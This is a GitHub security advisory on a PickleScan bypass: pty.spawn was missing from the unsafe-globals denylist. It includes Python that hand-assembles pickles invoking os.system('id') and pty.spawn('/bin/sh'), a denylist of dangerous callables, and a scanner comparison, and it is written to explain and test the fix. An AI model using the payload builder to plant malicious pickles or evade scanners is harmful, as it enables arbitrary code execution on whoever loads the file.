GHSA-hgrh-qx5j-jfwx: Picklescan Bypasses Unsafe Globals Check using pty.spawn
PickleScan checks the globals a pickle resolves against a list of unsafe modules and functions and flags the file when one matches. The pty module, and specifically pty.spawn, was absent from that list, so a pickle whose REDUCE call resolves pty.spawn passed the scan even though loading it would execute an attacker-chosen command. An attacker can therefore embed a malicious pickle payload in a file that would otherwise be scanned for pickle-based threats and have it reported as clean, leading to arbitrary code execution on whatever later loads the file. The fix (the referenced commit and pull request #53, released in v0.0.33) adds pty to the unsafe globals list.
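The bypass described above, as an added example that is not PickleScan's code and does not use its real unsafe-globals list: a hand-assembled pickle that calls pty.spawn, a minimal opcode-level extractor of the globals a pickle resolves, and a constructed denylist shown before and after the missing pty entry. The names build_call_payload, referenced_globals, scan and both denylists are this example's own. The payload is only disassembled with pickletools, never loaded.

```python
import pickle
import pickletools
import struct

# Constructed for this example: a small module -> names denylist in the
# spirit of an unsafe-globals list. It is NOT PickleScan's real list; it
# only needs to show the gap the advisory describes.
UNSAFE_GLOBALS_BEFORE = {
    "os": {"system", "popen", "execv", "execvp"},
    "subprocess": {"Popen", "call", "check_output", "run"},
    "builtins": {"eval", "exec", "compile", "open"},
}
# The same denylist with the entry the advisory says was missing.
UNSAFE_GLOBALS_AFTER = {**UNSAFE_GLOBALS_BEFORE, "pty": {"spawn"}}

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
MEMO_PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT", "MEMOIZE"}
MEMO_GET_OPS = {"GET", "BINGET", "LONG_BINGET"}


def build_call_payload(module: str, name: str, arg: str, protocol: int = 2) -> bytes:
    """Hand-assemble a pickle whose only effect on load is module.name(arg).

    Nothing here executes anything; pickle.loads on the result would.
    Protocol 2 resolves the callable with GLOBAL, protocol 4 with
    STACK_GLOBAL (the form the standard pickler emits today).
    """
    mod, nam, a = module.encode(), name.encode(), arg.encode()
    if protocol < 4:
        body = (pickle.GLOBAL + mod + b"\n" + nam + b"\n"
                + pickle.BINUNICODE + struct.pack("<I", len(a)) + a)
    else:
        assert max(len(mod), len(nam), len(a)) < 256, "SHORT_BINUNICODE limit"
        body = (pickle.SHORT_BINUNICODE + bytes([len(mod)]) + mod + pickle.MEMOIZE
                + pickle.SHORT_BINUNICODE + bytes([len(nam)]) + nam + pickle.MEMOIZE
                + pickle.STACK_GLOBAL
                + pickle.SHORT_BINUNICODE + bytes([len(a)]) + a)
    # TUPLE1 wraps the argument, REDUCE performs the call, STOP ends the stream.
    return (pickle.PROTO + bytes([protocol]) + body
            + pickle.TUPLE1 + pickle.REDUCE + pickle.STOP)


def referenced_globals(data: bytes) -> set:
    """Return every (module, name) pair the pickle resolves.

    Walks the opcode stream with pickletools.genops, so nothing is unpickled.
    GLOBAL/INST carry both names in the opcode argument; STACK_GLOBAL takes
    them from the two strings below it on the stack, so string pushes and
    memo puts/gets are tracked just far enough to recover them.
    """
    found = set()
    strings = []   # string constants currently on the stack, in push order
    memo = {}      # memo slot -> string, or None when a non-string was stored
    prev_string = None
    for op, arg, _pos in pickletools.genops(data):
        if op.name in MEMO_PUT_OPS:          # stack unchanged by a memo put
            memo[len(memo) if op.name == "MEMOIZE" else arg] = prev_string
            continue
        pushed = None
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.add((module, name))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            name, module = strings.pop(), strings.pop()
            found.add((module, name))
        elif op.name in STRING_OPS:
            pushed = arg
        elif op.name in MEMO_GET_OPS:
            pushed = memo.get(arg)
        if pushed is not None:
            strings.append(pushed)
        prev_string = pushed
    return found


def scan(data: bytes, unsafe_globals: dict) -> list:
    """Flag the globals in the pickle that appear in the denylist."""
    return sorted((m, n) for m, n in referenced_globals(data)
                  if n in unsafe_globals.get(m, ()))


if __name__ == "__main__":
    for module, name, arg in (("os", "system", "id"), ("pty", "spawn", "/bin/sh")):
        for proto in (2, 4):
            payload = build_call_payload(module, name, arg, proto)
            print(f"{module}.{name} proto {proto}: "
                  f"before={scan(payload, UNSAFE_GLOBALS_BEFORE)} "
                  f"after={scan(payload, UNSAFE_GLOBALS_AFTER)}")
```

Run stand-alone, the os.system payload is flagged by both denylists while the pty.spawn payload is flagged only after the pty entry is added, in both the GLOBAL and the STACK_GLOBAL encoding. The broader caveat is that any denylist of this kind is a list of known-bad callables; any other importable function that runs a command would be missed the same way, which is why a scan result of "clean" should not by itself justify unpickling untrusted data.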
References
- github.com/advisories/GHSA-hgrh-qx5j-jfwx
- github.com/mmaitre314/picklescan
- github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab
- github.com/mmaitre314/picklescan/pull/53
- github.com/mmaitre314/picklescan/releases/tag/v0.0.33
- github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx